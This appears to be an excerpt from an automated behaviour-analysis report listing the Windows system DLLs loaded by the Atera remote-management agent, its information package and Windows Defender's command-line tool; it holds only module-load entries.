                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                                Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: napinsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: pnrpnsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wshbth.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: nlaapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winrnr.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
